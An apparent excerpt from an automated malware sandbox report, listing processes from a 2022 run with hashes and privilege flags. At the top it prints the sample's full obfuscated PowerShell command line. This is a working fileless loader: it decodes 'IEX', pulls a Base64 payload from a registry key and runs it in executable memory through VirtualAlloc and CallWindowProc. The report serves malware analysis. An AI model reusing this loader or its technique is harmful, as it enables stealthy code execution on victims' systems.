KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;;
                  Imagebase:0xc20000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Target ID:4
                  Start time:18:23:30
                  Start date:29/11/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c72c0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:7
                  Start time:18:24:32
                  Start date:29/11/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
                  Imagebase:0xd30000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  Target ID:8
                  Start time:18:24:33
                  Start date:29/11/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
                  Imagebase:0x1080000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  No disassembly